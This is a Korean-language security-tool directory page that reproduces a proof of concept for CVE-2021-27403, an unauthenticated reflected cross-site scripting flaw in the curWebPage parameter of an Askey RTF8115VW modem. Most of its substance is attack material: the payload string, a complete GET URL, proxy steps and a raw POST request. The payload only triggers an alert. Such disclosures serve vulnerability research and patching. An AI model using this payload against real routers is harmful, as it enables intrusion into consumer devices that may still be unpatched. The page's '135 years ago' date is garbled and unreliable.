Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2021-27403 — XSS-Askey | Kitploit
도구/GitHubGitHub/bokanrb/cve-2021-27403
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubbokanrb/cve-2021-27403

CVE-2021-27403

XSS-Askey

저장소 보기
135년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

인증되지 않은 크로스 사이트 스크립팅 - Askey 인터넷 광대역 모뎀

벤더: Askey
소프트웨어 버전: BR_SV_g11.11_RTF_TEF001_V6.54_V014
모델: RTF8115VW
취약한 파라미터: curWebPage
페이로드: ";alert('xss')//
다른 모델/버전에서는 테스트되지 않았습니다.

GET 요청을 통해

root@kitploit:~
At the login request we can issue a GET Request:
http://x.x.x.x/cgi-bin/te_acceso_router.cgi?curWebPage=/settings-internet.asp";alert('xss')//&loginUsername=admin&loginPassword=admin

The Username and Password param, don't need to be valid.

대체 텍스트

POST 요청을 통해

root@kitploit:~
1) 프록시(Burp/ZAP 등)를 설정하여 로그인 요청을 가로챕니다.
2) curWebPage 파라미터가 사용하는 .asp 페이지 뒤에 페이로드를 입력합니다.
3) 요청을 전달합니다.

최종 요청

root@kitploit:~
POST /cgi-bin/te_acceso_router.cgi HTTP/1.1
Host: x.x.x.x
Origin: http://x.x.x.x
Cookie: _httpdSessionId_=ece9eb5b733f7cbc8198ce9b6ab995c2
Upgrade-Insecure-Requests: 1
Referer: http://x.x.x.x/login.asp
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Connection: close
Cache-Control: max-age=0
Accept-Encoding: gzip, deflate
Content-Length: 35

curWebPage=%2Fsettings-firewall.asp+payload
 <!---curWebPage=%2Fsettings-firewall.asp";alert('xss')//--->
도구 다운로드